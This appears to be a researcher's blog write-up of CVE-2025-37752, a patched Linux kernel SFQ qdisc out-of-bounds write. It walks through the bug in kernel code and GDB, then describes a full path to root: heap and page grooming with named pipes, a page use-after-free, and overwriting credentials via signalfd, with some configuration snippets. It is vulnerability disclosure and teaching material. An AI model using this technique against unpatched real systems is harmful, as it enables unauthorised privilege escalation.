[CVE-2025-37752] Two Bytes Of Madness: Pwning The Linux Kernel With A 0x0000 Written 262636 Bytes Out-Of-Bounds
D3vil
D3vil
• 34 min read
CVE-2025-37752 is an Array-Out-Of-Bounds vulnerability in the Linux network packet scheduler, specifically in the SFQ queuing discipline. An invalid SFQ limit and a series of interactions between SFQ and the TBF Qdisc can lead to a 0x0000 being written approximately 256KB out of bounds at a misaligned offset. If properly exploited, this can enable privilege escalation.
Overview
SFQ is a classless queueing discipline designed to ensure fair bandwidth distribution among various network data flows.
When utilized as child of a TBF Qdisc, if the SFQ limit is set to one, a series of interactions between the two Qdiscs may lead to an underflow in the sfq_dec() function if the Qdisc qlen is decremented from zero. This can result in a 16bit value being written approximately 256KB out of bounds when the underflowed qlen is used as an index in the sfq_sched_datadep array in sfq_link().
The original crash was triggered by Syzkaller and addressed by Google. However, the initial patch could still be bypassed, allowing the limit to be indirectly set to one. The bug has been fixed by commits 8c0cea59d40cf6dd13c2950437631dd614fbade6 and b3bf8f63e6179076b57c9de660c9f80b5abefe70. The first commit created a temporary area to process the Qdisc parameters, while the second moved the limit check to the end of the function. All kernel versions prior to these commits that have CONFIG_NET_SCH_SFQ and CONFIG_USER_NS enabled are affected.
In this article, after analyzing the vulnerability, we will explore how I went from “This is just a DOS” to “This is impossible to exploit” to ultimately causing a page-UAF that allowed me to compromise all of Google’s kernelCTF instances with the same binary.
TL;DR? Click here
Spray sfq_slots in kmalloc-64 to prevent an immediate kernel crash when the bug is triggered.
Prevent a type-confused skb from being dequeued by reconfiguring the TBF Qdisc. Drop TBF rate and add packet overhead before the OOB write occurs.
Use the 0x0000 written 262636 bytes OOB to corrupt the pipe->files field of a named pipe, free the pipe, cause page-level UAF and get arbitrary R/W in that page.
Reclaim the freed page with signalfd files and use the page-level R/W primitive to swap file->private_data with file->f_cred.
Get root by overwriting the process credentials with zeros via signalfd4().
Vulnerability Analysis
When a SFQ Qdisc is initialized, sfq_change() is called. Despite an initial check explicitly prohibiting a limit equal to one, the Qdisc limit can still be indirectly set to this value when other Qdisc parameters are updated:
staticintsfq_change(structQdisc*sch,structnlattr*opt,structnetlink_ext_ack*extack){// ...
// Initial check prohibiting limit == 1
if(ctl->limit==1){NL_SET_ERR_MSG_MOD(extack,"invalid limit");return-EINVAL;}// ...
if(ctl->flows)q->maxflows=min_t(u32,ctl->flows,SFQ_MAX_FLOWS);if(ctl->divisor){q->divisor=ctl->divisor;q->maxflows=min_t(u32,q->maxflows,q->divisor);}if(ctl_v1){if(ctl_v1->depth)q->maxdepth=min_t(u32,ctl_v1->depth,SFQ_MAX_DEPTH);// ...
}if(ctl->limit){// Here if q->maxdepth = 1 and q->maxflows = 1
// The ctl->limit == 1 check above can be bypassed and q->limit set to 1
q->limit=min_t(u32,ctl->limit,q->maxdepth*q->maxflows);q->maxflows=min_t(u32,q->maxflows,q->limit);}// ...
}
q->limit determines the maximum number of packets in the Qdisc queue. In sfq_enqueue(), when a new packet arrives, if the Qdisc queue length (aka qlen) exceeds this limit, the packet is dropped:
If q->limit is set to one and packets are sent to the network interface in a burst, a complex chain of interactions between TBF and SFQ can lead to multiple bugs, including an array out-of-bounds write vulnerability.
Let’s explore step by step what happens if we send three packets in a burst to a network interface configured as follows:
tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, SFQ qlen is incremented to 1:
tbf_enqueue()qdisc_enqueue()sfq_enqueue()// SFQ qlen is 0
slot=q->slots[0]slot_queue_add()slot->skblist_next=skb_Aslot->skblist_prev=skb_Aq->tail=slot++sch->q.qlen// SFQ qlen = 1
// SFQ qlen <= limit, skb_A is enqueued
tbf_dequeue() is called. Since thesch->gso_skb list is empty, sfq_dequeue() is invoked, and the packet correctly dequeued. SFQ qlen is decremented to 0. So far so good:
tbf_dequeue()qdisc_peek_dequeued()skb_peek(&sch->gso_skb)// sch->gso_skb is empty
sfq_dequeue()// SFQ qlen is 1
slot=q->tailslot_dequeue_head()skb_A=slot->skblist_nextslot->skblist_next=slotslot->skblist_prev=slotsch->q.qlen--// SFQ qlen = 0
__skb_queue_head(&sch->gso_skb,skb);sch->q.qlen++// SFQ qlen = 1
// TBF has enough tokens, so the packet can be dequeued
qdisc_dequeue_peeked()skb_A=__skb_dequeue(&sch->gso_skb)sch->q.qlen--// SFQ qlen = 0
Packet B is sent (skb_B)
tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, SFQ qlen is incremented to 1:
tbf_enqueue()qdisc_enqueue()sfq_enqueue()// SFQ qlen is 0
slot=q->slots[0]slot_queue_add()slot->skblist_next=skb_Bslot->skblist_prev=skb_Bq->tail=slot++sch->q.qlen// SFQ qlen = 1
// SFQ qlen <= limit, skb_B is enqueued
tbf_dequeue() is called, which in turn calls sfq_dequeue(). The packet is correctly dequeued from SFQ, but TBF ran out of tokens, so it reschedules itself for later using qdisc_watchdog_schedule_ns(). The SFQ qlen remains 1, as packet B is still considered to be in the queue (it is actually in the gso_skb list):
tbf_dequeue()qdisc_peek_dequeued()skb_peek(&sch->gso_skb)// sch->gso_skb is empty
sfq_dequeue()// SFQ qlen is 1
slot=q->tailslot_dequeue_head()skb_B=slot->skblist_nextslot->skblist_next=slotslot->skblist_prev=slotsch->q.qlen--// SFQ qlen = 0
__skb_queue_head(&sch->gso_skb,skb);sch->q.qlen++// SFQ qlen = 1
// TBF runs out of tokens, reschedules itself for later
qdisc_watchdog_schedule_ns()
Packet C is sent (skb_C)
tbf_enqueue() is called, which in turn calls sfq_enqueue(). Packet C is added to the first SFQ slot, q->tail is set to slot, the SFQ qlen incremented from 1 (packet B is still enqueued!) to 2. However, since qlen is now greater than q->limit, the packet is dropped.
sfq_drop() uses slot_dequeue_tail() to remove the packet from the slot. Now the slot->skblist_next and slot->skblist_prev fields, point to the slot itself. Finally, SFQ qlen is decremented to 1:
Notice how q->tail is not NULL at this point, it still corresponds to slot, but now the slot->skblist_next and slot->skblist_prev point to the slot itself rather than to a valid sk_buff.
tbf_dequeue() attempts to dequeue packet B from the sch->gso_skb list, but it is still out of tokens, so it reschedules itself once again:
tbf_dequeue()qdisc_peek_dequeued()skb_peek(&sch->gso_skb)// sch->gso_skb is _not_ empty (contains Packet B)
// TBF is still out of tokens, reschedules itself for later
qdisc_watchdog_schedule_ns()
The first qdisc-watchdog timer fires
Approximately 1 second later (the time depends on the TBF configuration), the Qdisc watchdog timer fires, and tbf_dequeue() is called again. Packet B is removed from the sch->gso_skb list and correctly dequeued. The SFQ qlen is decremented to 0:
tbf_dequeue()qdisc_peek_dequeued()skb_peek(&sch->gso_skb)// sch->gso_skb is NOT empty
qdisc_dequeue_peeked()skb_B=__skb_dequeue(&sch->gso_skb)// Remove the packet from sch->gso_skb
sch->q.qlen--// SFQ qlen = 0
The second qdisc-watchdog timer fires (and things go bad)
The second Qdisc watchdog timer fires, now the sch->gso_skb list is empty, so sfq_dequeue() is called. However, since q->tail is not NULL, slot_dequeue_head() is used to dequeue the skb. The issue arises because slot_dequeue_tail() in sfq_drop() set slot->skblist_next and slot->skblist_prev to the address of the slot itself, so a type confusion bug between a sk_buff and a sfq_slot occurs.
sfq_dec() is then called and the SFQ slot qlen is decremented from zero, resulting in an underflow. The underflowed qlen is subsequently used as an index in the q->dep array (q here is a sfq_sched_data structure), and this is where the out-of-bounds write occurs:
tbf_dequeue()qdisc_peek_dequeued()skb_peek(&sch->gso_skb)// sch->gso_skb is empty
sfq_dequeue()// SFQ qlen = 0
slot=q->tailslot_dequeue_head()skb=slot->skblist_next// but slot->skblist_next = slot, TYPE CONFUSION!
sfq_dec()q->slots[0].qlen--;// SFQ qlen = 0xFFFF, UNDERFLOW!
sfq_link()qlen=slot->qlen// 0xFFFF
...q->dep[qlen].next=0;// 0x0000 written OOB!
// TBF runs out of tokens, reschedules itself for later
qdisc_watchdog_schedule_ns()
Interestingly, FizzBuzz101 and I recently discovered a bug that allowed us to crash five different Qdiscs. Initially, we thought the root cause was different, but thanks to the kernel developer Cong Wang, we conducted further analysis and realized it was due to an interaction between the Qdiscs and TBF, very similar to the case described above! The discussion can be found here.
In-Depth Analysis (GDB Time)
Using GDB, we can inspect what happens when the Qdisc watchdog timer fires for the second time and the series of bugs is triggered. By setting a breakpoint at sfq_dequeue(), we can clearly see that after calling slot_dequeue_head(), the returned skb address and the sfq_slot address are the same. A type confusion occurred:
staticstructsk_buff*sfq_dequeue(structQdisc*sch){// ...
a=q->tail->next;// a = 0
slot=&q->slots[a];// first (and only) slot retrieved
// ...
skb=slot_dequeue_head(slot);// Type confusion, skb is a sfq_slot!
sfq_dec(q,a);// OOB write
// ...
}staticinlinestructsk_buff*slot_dequeue_head(structsfq_slot*slot){structsk_buff*skb=slot->skblist_next;// slot->skblist_next == slot, so skb = slot
slot->skblist_next=skb->next;skb->next->prev=(structsk_buff*)slot;skb->next=skb->prev=NULL;returnskb;}
If we step into the sfq_dec() function, we can observe how the slot qlen is decremented from 0, causing an underflow (qlen is a u16, so it will become 0xFFFF):
Finally, by stepping into sfq_link(), we can see how the qlen value, now 0xFFFF, is used as an index in the sfq_sched_datadep array.
Since this array can hold a maximum of SFQ_MAX_DEPTH + 1 (127 + 1) objects, each 16 bytes in size, the index 0xFFFF will cause an out-of-bounds write:
We know the address of sfq_sched_data and the offset of sfq_sched_data (privdata) in the Qdisc structure (0x180 bytes). From this we can derive the address of the current Qdisc object.
Using GDB we can also determine where the 0x0000 is written out of bounds. By subtracting the current object address from this value, we can obtain the distance between the Qdisc object and the victim address:
sfq_sched_data_addr=0xffff88802e537980oob_write_addr=0xffff88802e5779ecprivdata_offset_in_qdisc=0x180# sfq_sched_data offset in Qdiscqdisc_addr=sfq_sched_data_addr-privdata_offset_in_qdiscdistance=oob_write_addr-qdisc_addrprint(hex(distance))# 0x401EC or 262636 bytes
So we have a 0x0000 written only 262636 bytes after the vulnerable Qdisc object. Things are getting interesting.
This Is Not Exploitable…
At this point, I honestly thought this was impossible to exploit. I also showed the bug and provided a quick explanation to FizzBuzz101, and he agreed. The 256KB+ out-of-bounds write primitive at a misaligned offset (0x1EC) seemed extremely limited, and as if that weren’t enough, the kernel was crashing right after sfq_dec() due to an invalid pointer access. However, I decided to persist and continued with further investigation.
We need to keep in mind that due to the sk_buff/sfq_slot type confusion, the skb returned by slot_dequeue_head() in sfq_dequeue() is not actually a skb, but rather a
Dr. Evil attempting to explain to his crew that the skb is not really an skb
This means that every access to this "skb" translates to an access to a sfq_slot, which can potentially lead to a crash. For instance, the kernel will immediately panic right after the out-of-bounds write in sfq_dec(), due to an invalid pointer access in qdisc_bstats_update(sch, skb):
staticstructsk_buff*sfq_dequeue(structQdisc*sch){// ...
skb=slot_dequeue_head(slot);// Type confusion, skb is a sfq_slot
sfq_dec(q,a);// OOB write!
qdisc_bstats_update(sch,skb);// Kernel panic! :(
// ...
}
But this is not the only problem we need to address if we want to exploit the vulnerability. If the "skb" is dequeued from both SFQ and TBF, it will inevitably lead to a crash when it is processed further.
Stabilization: Addressing The First Kernel Panic In qdisc_bstats_update()
The first kernel crash occurs in qdisc_bstats_update(), right after the sfq_dec() call. qdisc_bstats_update() is defined as follows:
skb_is_gso() utilizes the macro skb_shinfo(), which uses skb_end_pointer(). This, in turn, relies on the skb->head pointer and skb->end of the sk_buff to determine where the packet data ends and the actual skb_shared_info begins.
Now, offsetof(struct sk_buff, head) = 192, but in our case, the "skb" is actually a sfq_slot, which is allocated in kmalloc-64. Therefore, an access to skb->head at offset 192 translates to an access to the first qword of another object in kmalloc-64, specifically, the first qword of the third object after the "skb". If this qword does not contain a valid pointer, the kernel crashes when the pointer is dereferenced to access ->gso_size.
The slots array is allocated by sfq_init() using sfq_alloc(), a kvmalloc wrapper. Each sfq_slot is 64 bytes in size and the number of slots in the array depends on q->maxflows. Our SFQ configuration only has a single flow, which results in a single slot allocated in kmalloc-64 per Qdisc.
If we want to prevent the kernel from crashing, we need to populate the kmalloc-64 slab with objects that have a valid pointer as their first qword.
Luckily, we don’t need to look too far. When a sfq_slot is initialized, the first and second qwords are set to its own address, so we can fake a valid skb->head pointer by spraying sfq_slot(s) in kmalloc-64.
The offset 192, relative to the type-confused sfq_slot, will correspond to the slot->skblist_next pointer of the third slot after the current one. This will result in the following situation:
This was an easy win. Now let’s address the second kernel panic when the "skb" is dequeued from both SFQ and TBF.
Stabilization: Addressing The Second Kernel Panic In validate_xmit_skb()
After the type confusion and the out-of-bounds write, sfq_dequeue() will return the type-confused "skb" in tbf_dequeue() which in turn will return it in dequeue_skb(). This function will pass the dequeued "skb" to sch_direct_xmit(), which will call validate_xmit_skb_list(). This will lead to a call to validate_xmit_skb(), where the kernel will crash due to another invalid pointer access:
Now, I won’t dig too much into it, but having a sk_buff type confused with a sfq_slot wandering around the kernel is not a good idea. Therefore, instead of trying to fake pointers in kmalloc-64 as we did to address the previous crash, we want to tackle the root cause and prevent the packet from being dequeued.
I could not find a way to prevent SFQ from dequeuing the "skb", so I decided to focus on TBF. Here is the tbf_dequeue() function:
staticstructsk_buff*tbf_dequeue(structQdisc*sch){structtbf_sched_data*q=qdisc_priv(sch);structsk_buff*skb;skb=q->qdisc->ops->peek(q->qdisc);// "skb" returned by sfq_dequeue()
if(skb){s64now;s64toks;s64ptoks=0;unsignedintlen=qdisc_pkt_len(skb);// [6]
now=ktime_get_ns();toks=min_t(s64,now-q->t_c,q->buffer);// ...
toks+=q->tokens;// [4]
if(toks>q->buffer)toks=q->buffer;// [5]
toks-=(s64)psched_l2t_ns(&q->rate,len);// [3]
// Here we need toks|ptoks to be < 0
if((toks|ptoks)>=0){// [1]
skb=qdisc_dequeue_peeked(q->qdisc);if(unlikely(!skb))returnNULL;// ...
returnskb;}qdisc_watchdog_schedule_ns(&q->watchdog,now+max_t(long,-toks,-ptoks));// [2]
qdisc_qstats_overlimit(sch);}returnNULL;}
In tbf_dequeue(), if the amount of remaining tokens is greater than zero, the packet is dequeued [1]. Otherwise the Qdisc reschedules itself for later using qdisc_watchdog_schedule_ns(). [2] In this case, the opposite of the number of tokens corresponds to the number of nanoseconds to wait before rescheduling.
To prevent the packet from being dequeued, we need to solve a min/max problem. We want to minimize toks and maximize the value returned by psched_l2t_ns(), so that when this value is subtracted from toks, we can obtain a negative number (the lower, the better). [3]
This approach looks promising, as we can indirectly minimize toksby controllingq->buffer and q->tokens in tbf_change()[4][5]. Additionaly, we can (probably) maximize the the "skb" packet length (keep in mind that our skb is a sfq_slot) [6], by controlling sfq_slot field.
As we can see, offsetof(struct sk_buff, cb) = 40 and offsetof(struct qdisc_skb_cb, pkt_len) = 0. Now, our "skb" is a sfq_slot, and offset 40 (0x28 in hexadecimal), overlaps (in the Google kernelCTF LTS 6.6.8* instances) with sfq_slot->vars.qcount.
The slot->vars.qcount field, is automatically set to -1 by red_set_vars() when a new packet is enqueued in sfq_enqueue(). So we are fortunate, as when the type-confusion occurs, this will result in a very large packet size, 0xFFFFFFFF.
However, our luck did not last very long. The memory alignment of the sfq_slot structure differs from system to system. In Google COS 105, and generally for systems before Linux 6.6.8*, skb->cb.pkt_size overlaps with slot->vars.qavg.
I could not find a way to reliably set qavg to a large number, and since one of my goals was to reuse the same binary to exploit all the Google kernelCTF instances, I needed to find a more generic solution.
Attempt 2: Reconfiguring The TBF Qdisc Before The Watchdog Timer Fires (SUCCESS)
Since we have direct control over q->tokens and q->buffer in tbf_change(), we could attempt to reconfigure the TBF Qdisc before the type-confused "skb" is dequeued, in other words, before the second watchdog timer fires.
We can minimize q->tokens and q->buffer by dropping the TBF rate via TCA_TBF_RATE64. Additionally, we can try to maximize the packet length by adding packet overhead. This value will be added to the real packet length (well, in our case it’s “real”…) in psched_l2t_ns().
structtc_tbf_qoptopt={.limit=10000,.rate.overhead=0xffff,// Add packet overhead
};options=nlmsg_alloc();nla_put(options,TCA_TBF_PARMS,sizeof(opt),&opt);nla_put_u32(options,TCA_TBF_BURST,99);nla_put_u64(options,TCA_TBF_RATE64,1);// Drop the rate limit
nla_put_nested(msg,TCA_OPTIONS,options);
With the new configuration, when the type confused "skb" is dequeued, TBF will run out of token, and it will reschedule itself again, this time for 18 hours later. Here is a summary of what happens:
sfq_dequeue() -> OOB write is triggered -> The type-confused "skb" is returned in tbf_dequeue() -> tbf_dequeue() is out of tokens -> reschedules itself for 18 hours later
65512964729825 nanoseconds correspond to approximately 65512 seconds, or about 18 hours, a time window that should be large enough to complete the exploitation process…
Two Bytes Of Madness
We finally managed to stabilize the bug and can trigger the vulnerability without crashing the kernel. But now… how do we exploit it? A 0x0000 written 256KB+ out of bounds to an unknown memory location, is not very useful.
A first step could consist of thinking about our 262636 bytes (or 0x401EC in hexadecimal) out-of-bounds write primitive, as 0x40000 + 0x1EC, in other words a jump of 256KB plus some misaligned offset within a 4KB page. This would allow us to split the problem in two parts:
We need to find an object with a field that, once corrupted, can provide us with some useful exploitation primitives. This field must be at a specific offset within a page (Refcount -> UAF?)
We need to control large portions of kernel memory to maximize the probability of making the 0x0000 land in the designated victim object and not elsewhere
Finding The Victim Object
The SFQ Qdisc (struct Qdisc + struct sfq_sched_data) is allocated in kmalloc-2k. We know that in kmalloc-2k each object is 2048 bytes in size. Thus, each 4KB page can contain two of these objects.
If we try to make the 0x0000 land in a 4KB page containing two other kmalloc-2k objects, the u16 value can be written at two different offsets: 0x1EC or 0x9EC, depending on the offset in the page of the attacking SFQ Qdisc object (+0x00 or +0x800).
Let’s consider another example, this time utilizing kmalloc-256 as the target cache. This cache requires one order 0 page (4KB) and can contain 16 objects, each 256 bytes in size. If he attacking SFQ Qdisc object is allocated at offset +0x00 in its page, the 0x0000 will corrupt the second object in kmalloc-256, specifically the field at offset 236 within it. If the attacking object is allocated at offset +0x800 instead, the ninth object will be corrupted, even in this case, at offset 236.
What about misaligned caches, for example kmalloc-192? If the attacking SFQ Qdisc object is allocated at offset +0x00 in the 4KB page, the 0x0000 will corrupt the third object in the target slab, specifically, the field at offset 108 within it. If the offset of the attacking object is +0x800, the fourteenth object will be corrupted, this time the field at offset 44:
Here, I will provide you with a table containing all the data cache, (object in the slab, offset in the object) for every general-purpose cache and for two other caches, cred_jar and filp. If you manage to find another object that can be corrupted to achieve privilege escalation based on this data, please ping me, I would be very curious to hear about your strategy!
With this data in hand, I utilized libksp, a Python library I developed some time ago, to convert kernel structures into Python objects, allowing for various types of queries. For each cache, I searched for structures (and nested structures) with fields of 1, 2, and 4 bytes in size that could align with the offsets provided in the table above.
The tool returned a very large number of results (~1400 aligned fields, including false positives), but I could not find anything useful.
I was mainly looking for reference counters to set to zero so I could cause a UAF.
I was about to give, up but then I noticed something interesting…
I have already used pipes in multiple exploits, but I did not know how the files field was used, so I decided to dig into it. pipe_inode_info is defined as follows:
With our out-of-bounds write primitive, we can overwrite pipe->files of the third pipe in the slab [2] if the attacking SFQ Qdisc object is allocated at offset +0x00 in the page, or the pipe->rd_wait[1] waitqueue of the fourteenth object in the slab if the attacking kmalloc-2k object offset is +0x800.
The pipe->files field, is used as a reference counter to determine when a pipe_inode_info structure and all the related objects need to be released. The problem is that this field cannot be controlled by using pipe(), as this value is always set to two for normal pipes.
Instead, we need to use named pipes created with mkfifo().
When a named pipe is opened, fifo_open() is called. If inode->i_pipe is not present, a new pipe_inode_info object is allocated by alloc_pipe_info() in kmalloc-cg-192 and pipe->files incremented. If inode->i_pipe is already present, then only pipe->files is incremented:
staticintfifo_open(structinode*inode,structfile*filp){structpipe_inode_info*pipe;boolis_pipe=inode->i_sb->s_magic==PIPEFS_MAGIC;intret;filp->f_version=0;spin_lock(&inode->i_lock);if(inode->i_pipe){// inode->i_pipe already present, increment the pipe->files counter
pipe=inode->i_pipe;pipe->files++;// [1]
spin_unlock(&inode->i_lock);}else{// inode->i_pipe is not present, allocate a new pipe_inode_info object
spin_unlock(&inode->i_lock);pipe=alloc_pipe_info();// [2]
if(!pipe)return-ENOMEM;pipe->files=1;// ...
inode->i_pipe=pipe;// ...
}filp->private_data=pipe;// ...
}structpipe_inode_info*alloc_pipe_info(void){// ...
// sizeof(struct pipe_inode_info) = 168. GFP_KERNEL_ACCOUNT is set
// So it goes into kmalloc-cg-192
pipe=kzalloc(sizeof(structpipe_inode_info),GFP_KERNEL_ACCOUNT);// ...
}
When the file descriptor of a named pipe is closed, put_pipe_info() is called, and if --pipe->files is 0, the pipe_inode_info structure and all the associated objects are released:
Pipe deallocation is performed by free_pipe_info(). This function starts iterating through all the pipe buffers, and releases them by calling pipe_buf_release(), which internally calls buff->ops->release() (anon_pipe_buf_release()).
The very interesting part is that upon release, free_pipe_info() also frees the pipe->tmp_page if present. In our case, this would cause a page-UAF, as we still have access to the freed pipe. This is a very powerful primitive!
It looks like we have finally found a valid victim object; now we need to find a way to reliably control the kernel memory layout.
Controlling The Kernel Memory Layout
We have identified our target object. We know it is allocated in kmalloc-cg-192 by alloc_pipe_info(), and we know that with our out-of-bounds write, assuming we can achieve good control over kernel memory, we have a 50% chance of overwriting pipe->files instead of pipe->rd_wait, and trigger a page-UAF that can provide us with a R/W primitive in an arbitrary page of memory.
Now, we need to control the kernel memory layout, as this moment, we are in this situation:
What I did was start thinking about memory in logical blocks of 256KB each, with the goal of alternating between a 256KB memory block containing attacking objects (grey blocks) with one or more, containing victim objects (red blocks):
The attacking object, a SFQ Qdisc (struct Qdisc + struct sfq_sched_data) is allocated in kmalloc-2k. According to /proc/slabinfo, a kmalloc-2k slab requires one order 3 page and can hold 16 objects, each 2KB in size.
Therefore, assuming we can access a contiguous portion of memory, if we logically partition the kernel memory into multiple blocks of 256KB each, we can populate a 256KB block with 8 order 3 pages (corresponding to 8 kmalloc-2k slabs) by allocating 128 kmalloc-2k objects in a row. This would result in the following situation in memory:
Then we proceed to fill the next 256KB block with 64 order 0 pages (corresponding to 64 kmalloc-192 slabs). Each kmalloc-192 slab holds 21 object, each 192 bytes in size. This means that if we want to fill 256KB of memory, we need to allocate 1344 kmalloc-192 objects:
Please note that the memory layout described above can only be theoretically achieved. In reality, many variables cannot be controlled. For instance, we don’t know when a new slab is allocated (perhaps SLUBStick could help in this case?), we don’t know if other pages are being freed by other processes, which could disrupt our attempt to access a contiguous portion of memory, and so on. However, attempting to obtain this memory layout is a good starting point.
Now, the kernel page allocator organizes pages of a different order and migration type in different freelists. If we want alternate between a 256KB block containing 8 order 3 pages (or 8 kmalloc-2k slabs) and a 256KB block containing 64 order 0 pages (or 64 kmalloc-cg-192 slabs), we first need to drain all the PCP lists for the for the unmovable migration type (kernel slabs are allocated using this migration type) and possibly all the buddy freelist for the same migration type, from order 0 up to order 3 or even higher.
This way, subsequent requests will force the buddy allocator to split higher order pages into lower order buddies. This will give us access to relatively large portions of contiguous memory. If you are not familiar with the Linux Buddy allocator, or just need a quick refresh, I recently condensed some of my notes in an article: A Quick Dive Into The Linux Page Allocator.
Our goal is to reach the following memory configuration (or at least something similar), with a block of 256KB containing 128 kmalloc-2k objects (8 order 3 pages) and the following 256KB block containing 1344 kmalloc-cg-192 objects (64 order 0 pages):
This memory layout can also be used to trigger the bug multiple times from different 256KB blocks, but in our exploit, we will use a single write.
Exploitation Strategy
To sum it up, the following strategy, we should be able to go from 0x0000 written 256KB+ out of bounds to page-UAF and achieve arbitrary R/W in a page of memory:
Create many named pipes using mkfifo().
Drain unmovable pages from order 0 to 3.
Alternate between a 256KB block of memory containing SFQ Qdiscs and another block containing named pipes. At this stage, for all the pipes, pipe->files == 1.
Use the OOB write to set pipe->files of one of the pipes to 0. For all the pipes, pipe->files == 1, for the victim pipe, pipe->files == 0.
Reopen all the nemed pipes to increment pipe->files. For all the pipes, pipe->files == 2, for the victim pipe, pipe->files == 1.
Close all the named pipes, so pipe->files is decremented. For all the pipes, pipe->files == 1, for the victim pipe, pipe->files == 0.
free_pipe_inode() is called, the victim pipe is released, and pipe->tmp_page is freed, causing a page-UAF as we still have control over this page through the named pipe file descriptor obtained during the pipe spray in the third step.
GFP_HIGHUSER means that the allocated memory is not movable,
but it is not required to be directly accessible by the kernel.
An example may be a hardware allocation that maps data directly
into userspace but has no addressing limitations.
This indicates that the kernel is requesting an unmovable order 0 page. So when the page is freed, we can easily reclaim it with a slab allocated in a order 0 page with the same migration type.
We can use a filp slab, more precisely a filp slab containing signalfd files. Then, we can use pipe_read() and pipe_write() to swap the file->private_data pointer with file->f_cred, and use multiple writes to overwrite the process credentials with zeros, thanks to the most significant bytes of the signalfd_ctx mask via do_signalfd4():
staticintdo_signalfd4(intufd,sigset_t*mask,intflags){structsignalfd_ctx*ctx;// ...
if(flags&~(SFD_CLOEXEC|SFD_NONBLOCK))return-EINVAL;sigdelsetmask(mask,sigmask(SIGKILL)|sigmask(SIGSTOP));signotset(mask);if(ufd==-1){structfile*file;ctx=kmalloc(sizeof(*ctx),GFP_KERNEL);if(!ctx)return-ENOMEM;ctx->sigmask=*mask;// ...
file=anon_inode_getfile("[signalfd]",&signalfd_fops,ctx,O_RDWR|(flags&O_NONBLOCK));// ...
}else{// ...
// We swapped file->private_data with file->f_cred
// So here ctx = file->f_cred
ctx=fd_file(f)->private_data;// ...
ctx->sigmask=*mask;// Overwrite f_cred
// ...
}returnufd;}
Exploit Analysis
This section will be updated as soon as the exploit is published in the Google Security Research repository. If you are interested, keep an eye on PRs.
Additional Notes
In my local environment, I was able to get root privileges 30-40% of the times without crashing the kernel. Here are some insights to improve stability.
The most common crash caused by the exploit occurs when the pipe->rd_wait waitlist is corrupted by the 0x0000 instead of pipe->files.
Since achieving 90% stability with a bug like this can be very challenging, and I was uncertain about winning the race for the LTS slot (spoiler: I was right), I did not focus on the stability aspect. However, I believe that it is possible to identify the corrupted pipe without relying on pipe_read() and pipe_write(), but rather through a side-channel using pipe_ioctl().
When the pipe is freed and the UAF condition occurs, free_pipe_info() will also free pipe->bufs. This will cause the slab obfuscated freelist pointer to overlap with len and offset of one of the pipe buffers. Since we still have access to this pipe, pipe_ioctl() can be utilized to retrieve the number of bytes present in the pipe. If this size is very large, it indicates that we have found the corrupted pipe:
Another theoretically possible side channel (this is more complex, but fun!) would involve opening the pipes as write-only, so pipe->readers = 0 for all the pipes. When free_inode_info() frees the pipe, the slab obfuscated freelist pointer overlaps with pipe->nr_accounted and pipe->readers of pipe_inode_info, resulting in a very large pipe->readers value:
By default, an attempt to write to a write-only pipe without any active readers, results in a SIGPIPE (which can be handled in user-space using sigaction()) at the very beginning of pipe_write(). This means that if we write to all the pipes, we can identify the corrupted one when SIGPIPE is not received:
Although I managed to steal the mitigation instance flag using the same binary, the mitigations had a significant impact on stability. The main problem is caused by slab_virtual guard pages, unmapped space between slabs created when a new slab is allocated (see alloc_slab_meta()):
/*
* [data_range_start, data_range_end) is the virtual address range where
* this slab's objects will be mapped.
* We want alignment appropriate for the order. Note that this could be
* relaxed based on the alignment requirements of the objects being
* allocated, but for now, we behave like the page allocator would.
*/data_range_start=ALIGN(old_base+slub_virtual_guard_size,alloc_size);data_range_end=data_range_start+alloc_size;
Sometimes the 0x0000 written out of bounds hits one of these guard pages, leading to an inevitable crash. I could not find a way to bypass this issue, so I chose not to occupy the mitigation instance slot with a non-eligible submission. Here is the crash caused by a guard page:
The slot is still free, so if you can find a solution to this problem and achieve 70% stability, go for it! And if you do, please let me know! :)
Conclusion
This has been quite a journey! If you’ve made it this far, I hope you found this article helpful and learned something new.
This was probably the most fun exploit I’ve worked on, and I learned a lot, particularly about the importance of perseverance in this field.
A huge thanks goes to FizzBuzz101 for all the support, and to 0xTen for providing me with his kernelCTF automatic flag submitter, a program he originally used to win the race for the slot when he exploited a 0-day on Google’s systems.
In the end, despite the exploit working on all instances, I only managed to secure the COS 105 slot. The race for the LTS slot is very hard, and when I targeted 6.6.86, my pwntools script used to deliver the exploit broke badly resulting in a delayed submission (LOL).
The title of this article is inspired by Four Bytes Of Power by Alex Popov, an article where he explains his journey in exploiting a race condition bug in the vsock subsystem. His article is one of those that sparked my interest in kernel exploitation, so if you haven’t read it yet, you definitely should! In the end, four bytes gave him power, while 0x0000 drove me mad.